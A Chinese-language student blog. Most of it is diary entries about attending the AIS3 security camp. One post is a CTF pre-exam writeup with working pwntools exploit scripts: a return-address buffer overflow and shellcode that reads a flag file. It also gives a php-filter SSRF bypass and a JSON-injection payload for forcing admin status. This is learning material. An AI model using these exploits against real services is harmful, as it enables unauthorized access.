Ais3-Day3

AIS3系列文

課程

  • 早上是數位鑑識Forensics的課程,基本上類型就像是柯南一樣,在電腦蒐集資訊、分析,接著推測出前因後果。在講課的部分我認為都還可以吸收,但一到實作的課程,大家都被VM的設定搞死,有的人用Oracle、有人用VMware。我的虛擬機本身是開得起來的,但是弄個三分鐘整個畫面就沒有動作,讓我在第一步就先卡關,結果漸漸地大家就開始進入gartic.io的世界了。後來的我就是看講師秀他的各個工具,以及一些分析的SOP,真的是跟柯南很像呢。加上近幾年來的攻擊手法越來越多,防禦與調查這塊也是相當重要呢。

  • 下午是關於Crypto的課,我還蠻認真聽得,畢竟要做這個項目的報告。一開始是提到一點硬體的安全問題,慢慢切入到密碼學,RSA跳過沒有提,然後講到AES的運作流程,講師也提供一個填空的code要我們完成AES加密,當下是沒有做出來,但後來在寢室內有嘗試出來,然後不要亂從網路上(github)直接載其他人的加密演算法,會讓東西暴露在風險當中的。

  • 晚上跟我的組員開始討論要做些甚麼,於是跑到交大的漢堡王與組員討論出主題,當時講師提供了三個題目,本組的幾乎都是大大,對密碼學都有鑽研一些,大概只有我完全沒有密碼學的經驗,當時pre-exam也只解一題而已。後來投票出來,選了Meltdown&Spectre,說真的,我覺得這與密碼學沒什麼關係,應該只能算破密分析,不過當時很像也沒想那麼多,就繼續做下去了。回去寢室的路上,我一直向本寢的同胞聊我們做的主題,畢竟我也沒接觸過太多,一回到寢室之後,就開始狂翻文件,當天就理解了一些機制根運作。

住宿

  • 床硬,還是想回家
  • 宿舍隔壁的7-11準備要整修,屯了三天的早餐,不過最後還是沒吃完
  • 翻了一堆文件,英文又很破的我還是得面對
  • 很有默契的根這次一起來的同學糾團刷牙,洗澡這樣

食物

  • 早餐兩顆茶葉蛋18

交大的便利商店都有打折

  • 午餐滷味100

    • 當天發現他們的活動中心有食物區,以往都跑到女宿樓下,不過我還是覺得輔大小夜市滷味比較合胃口
  • 晚餐漢堡王99

    • 基本上就是根組員交流,邊吃邊討論要做出甚麼主題
  • 順路捕貨

    • 當天其實只是陪同學來逛一下7-11,殊不知店員提醒了要整修,就趁機囤貨一波

圖片

  • 報到排隊的畫面,那幾天我很像都沒拍甚麼照片

詳情可以看我IG精選動態
一回來兩天就感冒QAQ

留言與分享

Ais3-Day2

AIS3系列文

課程

  • 週二早上是偏硬體的課程,主要是在講硬體的逆向工程,感謝聯發科技提供板子。一開始在燒錄firmware,manual裡面有詳細的提供做法,結果windows遇到了一大堆問題,馬上開虛擬機換系統,中途也狂舉手,好不容易才有預設的貪吃蛇畫面。接著在介紹ARM的架構,剛經過MIPS洗禮的我,覺得兩個還蠻相似的,而且功能很像比MIPS還豐富,但也導致他的手冊紙內容多到很複雜。最後用ida來逆向他提供的程式,觀察main跟找出他的flag,不過最後那段code真的複雜到不太想看,又加上肚子開始餓了,就沒有仔細地往下做了。

  • 下午都在講AI的課程,說實在我重來沒有聽過裡面的實作,只看到一大堆數學式子,還有一大堆圖表,對這堂課的基礎知識完全沒有,所以都在做自己的事情,不然就是在睡QQ

  • 晚上是AIS3校友回娘家,這計畫也進行了五年了,不過我今年才來參加。很意外的看到本系的主任來開場,不過大學兩年都沒有上到他的課。晚餐就是活動提供的buffet,人龍真的是頗長的,不過我算是排比較前面的,至少有吃到一些東西,不過沒有吃得太多。後來官方群傳說一大堆都有拉肚子的情況(本人並沒有),店家最後有做出賠償,本人是覺得奶茶可能比較是罪魁禍首。活動的最後基本上就是各大企業的工商時間,感覺是來拉攏人才的,也有一部分是來經驗分享的(有看到之前來NISRA講課的講師),真的全部都是大大呢。

住宿

  • 開跟同寢室交流,基本上就是在自我介紹這樣。
  • 床還是很硬,真的還是想要回家睡
  • 這天的晚上我很像一直在看youtube,完全不想要想專題要做甚麼
  • 有玩一下板子
  • 室友的桌子被螞蟻攻擊幫QQ

食物

  • 交大校門口早餐店40
    • 蛋餅+紅茶
    • 新竹紅茶???
  • 午餐滷味95
    • 覺得很像在輔大夾同樣的份量比較便宜
  • 晚餐
    • 一盤buffet
  • 宵夜39
    • 忘記吃甚麼了,只有記得價錢

圖片

  • 每堂課都要簽到哦~~

詳情可以看我IG精選動態

留言與分享

Ais3_Day1

AIS3系列文

課程

  • 早上是開幕式,一樣不免俗地還是要有長輩跟大家打招呼,結果全場都死氣沉沉,參考自官方共筆 :「大家好!」(洪亮)「怎麼這麼小聲」(委屈貌)。一個小時基本上就是尬聊這樣。

  • 整場活動的第一個課程是關於分析假新聞的部分,講者從PTT去切入分析,從韓流是怎麼造出來,去分析PTT帳號,最後上了媒體的整體過程,但講者也收到許多攻擊私訊,(聽說講者的ptt帳號登入4000多天),造成困擾,另外也提到,之前的社群媒體不可逆傷害,日本關西機場事件,造成駐外大使心理壓力,最後選擇輕生。我覺得從日常生活中的一些社群媒體平台去分析還蠻有趣的,真的可以觀察出一些平常注意不到的東西,也警惕我們閱聽人,要有對於接收到的訊息有所警覺,而不是照單全收,最重要的,不要再去分享一些未經證實的一些新聞報導,很有可能成為製造假新聞的幫兇。課程後面有一些小小的R語言的分析實作,不過礙於環境的關係,我的RStudio一直載入lib,整個東西都不能編譯,導致後來也沒跟上整個流程。

  • 下午開始是Web的部分,最先是提到一些網路滲透的技術,提供了一些網站跟工具,像是可查憑證、解析過的網域、DNS資訊關係、以及網路列舉。然後真的不要用弱密碼,講師有說到每家公司一定會有一個Mark,然後真的被他登入成功。接下來就是一些實作,cmd_injection、SSRF,就是先講一下該技術的原理,接著會有Lab這樣,後來有提到一些Aws的一些漏洞,以前從來沒聽過這個東西,所以在Lab上面真的是卡到爆炸,記得我後來回宿舍的時候,一直請教我的室友,感謝他的教學。

  • 晚上是抽籤分組,基本上最一開始被分到Crypto我真的覺得走遠了,因為完全沒有在看密碼學。結果神秘的籤讓我跟一大堆強者一組。抽完籤後就在討論要甚麼,基本上我沒說甚麼話,因為真的太多名詞我真的無法理解,crypto零經驗的我只能在旁邊目瞪口呆,也不知道該說甚麼,真的是頗烙賽的。

住宿

  • 寢室成員組成

    • 永春高中高一升高二
    • 國防大學電機大四
    • 中山大學電機碩一
    • 還有我

      有涉及個資法,不列出姓名

  • 宿舍網路真的很快,500MB/1s,可惜我沒帶網路線,只能吃同寢的wifi

  • 床真的硬到爆,第一天就想回家睡了,還失眠。

食物

  • 早餐茶葉蛋*2 + 豆漿
    • 充滿蛋白質的早餐
  • 午餐自助餐65+coco珍奶
    • 覺得肉不行,感覺放了很久
  • 晚餐pizza
    • 馬上被秒殺,感謝乾爹斗內
  • 宵夜uber-eat
    • 麥當勞

圖片

  • 宿舍長這樣,我睡上鋪

詳情可以看我IG精選動態

留言與分享

Diary27

復活聲明

  • 很明顯天天寫日記的計畫已失敗,也大概三四個月沒更新了,課業繁忙到不想打日記了,終於要來更新了。

活動

  • 目前已完成NCPU,之後會補上近日心得。
  • 之前AIS3的writeup以補上
  • 歡迎來光顧我與同隊的同胞做的專案

一些心得

  • 差不多放了兩個禮拜的暑假了,前陣子都在期末考周,幾乎天天都留在學校念書,再前一陣子也在忙專案的一些事情,這學期真的累到不行。放完暑假後,沒什麼力氣打code,也給自己放空了很久,然後才想到我的網站都毫無更新QQ。

留言與分享

Pwn

Welcome BOF

  • 用objdump 或 ida 知道 [rbp-30h] ,必須壓過48 + 8 個byte,才能到return_address,但奇怪的是蓋48才過??

  • 然後要跳的這0000000000400687 <welcome_to_ais3_2019>

  • 利用pwntools

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
context(arch = 'i386', os = 'linux')

host = 'pre-exam-pwn.ais3.org'
port = 10001

r = remote(host, port)

p = 0x0000000000400687
payload = p64(p)


r.recvline()
r.sendline('A'*48 + payload)

r.interactive()

ORW

  • x86-64的結構
  • 裡用shellcraft產的shell-code,注入輸入點
  • 一樣查看buffer-overflow的點,跳到.data的address0x00000000006010A0,利用ida查看
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
context(arch = 'amd64', os = 'linux')


host = 'pre-exam-pwn.ais3.org'
port = 10001

r = remote(host, port)

# debug
'''
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
if args.G:
gdb.attach(p)
'''


shellcode = ''
shellcode += shellcraft.pushstr('/home/orw/flag')
shellcode += shellcraft.open('rsp', 0, 0)
shellcode += shellcraft.read('rax', 'rsp', 100)
shellcode += shellcraft.write(1, 'rsp', 100)

'''
log.info(shellcode)
'''

log.info(shellcode)
r.recvline()

r.sendline(asm(shellcode))
r.recvline()
p = 0x00000000006010A0
r.sendline('A'*40 + p64(p))
r.interactive()

reverse

Trivial

  • 用ida組出flag

web

SimpleWindow

  • 須利用離線版查看,可利用chorme工具改成offline顯示

Hidden

  • 在console中跑jscode,運行r()的function

d1v1n6

  • phpfilter,把index.php打包起來
  • decode之後發現不能用127.0.0.1,0.0.0.0
  • filter 包起 http://localhost
  • decode出來就是結果

Crypto

TCash

  • 將上面的ascii字元用md5 & sha256照做一次,會有一張表
  • 將兩個的結果做比對,取交集就是flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from hashlib import md5,sha256
cand = '[email protected],- _{}'

md5dic = {}
sha256dic = {}
'''
f = open('news.txt','w')
f2 = open('news2.txt','w')
'''
md5s = [41, 63, 46, 51, 6, 26, 42, 50, 44, 33, 29, 50, 27, 28, 30, 17, 31, 19, 46, 50, 33, 45, 26, 26, 29, 31, 52, 33, 1, 45, 31, 22, 50, 50, 50, 50, 50, 31, 22, 50, 44, 26, 44, 49, 50, 49, 26, 45, 31, 30, 22, 44, 30, 31, 17, 50, 50, 50, 31, 43, 52, 50, 53, 31, 30, 17, 26, 31, 46, 41, 44, 26, 31, 52, 50, 30, 31, 26, 39, 31, 46, 33, 27, 1, 42, 50, 31, 30, 12, 26, 27, 52, 31, 30, 12, 31, 46, 26, 27, 14, 50, 31, 22, 52, 33, 31, 41, 50, 46, 31, 22, 23, 41, 31, 53, 26, 21, 31, 33, 30, 31, 19, 39, 51, 33, 30, 39, 51, 12, 58, 60, 31, 41, 33, 53, 31, 3, 17, 50, 31, 51, 26, 29, 52, 31, 33, 22, 26, 31, 41, 51, 54, 41, 29, 52, 31, 19, 23, 33, 30, 44, 26, 27, 38, 8, 50, 29, 15]
sha256s = [61, 44, 3, 14, 22, 41, 43, 30, 49, 59, 58, 30, 11, 3, 24, 35, 40, 46, 3, 42, 59, 36, 41, 41, 41, 40, 9, 59, 23, 36, 40, 33, 42, 42, 42, 42, 42, 40, 44, 42, 49, 24, 49, 28, 42, 33, 24, 36, 40, 24, 33, 10, 24, 40, 35, 42, 42, 42, 40, 39, 9, 42, 3, 40, 24, 35, 24, 40, 3, 61, 49, 24, 40, 9, 42, 24, 40, 41, 17, 40, 12, 57, 11, 23, 43, 42, 40, 24, 18, 41, 11, 9, 40, 24, 18, 40, 3, 41, 11, 12, 42, 40, 44, 9, 59, 40, 61, 42, 3, 40, 44, 13, 61, 40, 3, 24, 29, 40, 59, 24, 40, 19, 18, 6, 59, 24, 18, 6, 22, 0, 39, 40, 61, 57, 3, 40, 17, 35, 42, 40, 58, 24, 58, 9, 40, 59, 44, 24, 40, 61, 48, 52, 61, 58, 9, 40, 19, 13, 59, 24, 53, 41, 11, 55, 55, 42, 58, 18]


for i in cand:
md5dic.setdefault(int(md5(i.encode()).hexdigest(),16) % 64, []).append(i)
sha256dic.setdefault(int(sha256(i.encode()).hexdigest(),16) % 64, []).append(i)

for i, j in zip(md5s, sha256s):
for ii in md5dic[i]:
if ii in sha256dic[j]:
print(str(ii), end='') # print(md5dic[i], sha256dic[j], end='\n\n')

Misc

Welcome

  • 簽到題

KcufsJ

  • 將code reverse 然後 run

Are you admin?

  • command injection
    • 讓name 對到 fucker
    • is_admin 對到 yes
    • 接下來讓隨便的東西對到dictionary,才能將is_admin做忽略
    • 最後再補上一個對照,因為最後有個引號

{\"name\":\"#{name}\",\"is_admin\":\"no\", \"age\":\"#{age}\"}

  • fucker","is_admin":"yes","2":{"a":"b
  • 18"},"1":"2

留言與分享

Diary26

今日課程

  • 微分方程
  • web

今日體驗

  • 上禮拜期中考周,就沒有天天更新了QQ。拿到了成績也警惕自己要天天算題目,一直忙於其他東西疏忽了練習,讓我這次考的沒有很好。web的PWA也是蠻茫的,又是陷入了低潮時期。不過考完試三天就把與惡看完真的頗爽的,雖然現在相當空虛。

今日做到的事情

  • 微分方程
  • 心靈休息

留言與分享

Diary25

今日課程

  • 作業系統
  • Pygame

今日體驗

  • 我覺得作業系統跟泛型應該是我最難捉摸的,有很大部分都還蠻茫的。不過日子要過,笑得過也是一天,還是笑著過生活好。今天是Pygame展出的日子,工時長達一個月左右,雖然我的code寫得真的糞到笑,但我真的很努力在吸收了。展出也蠻順利的,雖然我打了30場以上自己的遊戲,打到手都痛了。晚上自辦賽只寫了一題,另外那題讀不太懂意思,然後找到的規律很像也有問題,是不是有危機了呢?

Pygame-Rifleman 分享

https://github.com/william31212/Pygame

今日做到的事情

  • 順利展出
  • 心靈休息

留言與分享

Diary24

今日課程

  • 泛型
  • 防身術

今日體驗

  • 泛型是不是要GG惹,有一大堆東西都還沒有熟,有想退選的念頭。防身術也是下星期期中考,不過覺得蠻好玩的,比起其他科還有和藹可親許多。

今日做到的事情

  • 演算法
  • 計組Booth’s algorithm

留言與分享

Diary23

九天都沒更新,有點混XD

今日課程

  • 工數
  • web

九天分享

  • 一次放就放了9天,結果時間也過得很快,中間也沒念到甚麼書,然後投資蠻多時間在Pygame上面,還記得第一天去比賽,然後就幾乎都在家,清明連假有去掃墓這樣。

今日體驗

  • 放了九天的腦袋真的不是普通的爛,腦袋有點混沌,然後老師今天都沒出錯,所以加零分。下午web有小考,考的都跟考古一樣,很像有講到JQuery的東西ㄅ,不過沒什麼專心聽。覺得現在在還債,都沒唸書的下場QQQ

今日做到的事情

  • 念演算法

留言與分享

Diary22

今日課程

  • 演算法
  • 英文

今日體驗

  • 明天開始是大學生的九天連假,不過我猜只能在家打code,pygame的專案下禮拜要展出,然後星期五的演算法也要考,覺得快喘不過氣了,希望能撐得住,明天也有比賽要打,希望能過順利。接下來九天應該不定期更新

今日做到的事情

  • 念演算法

留言與分享

作者的圖片

halloworld

Welcome halloworld’s website


fju-csie: grade 3


NewTaipei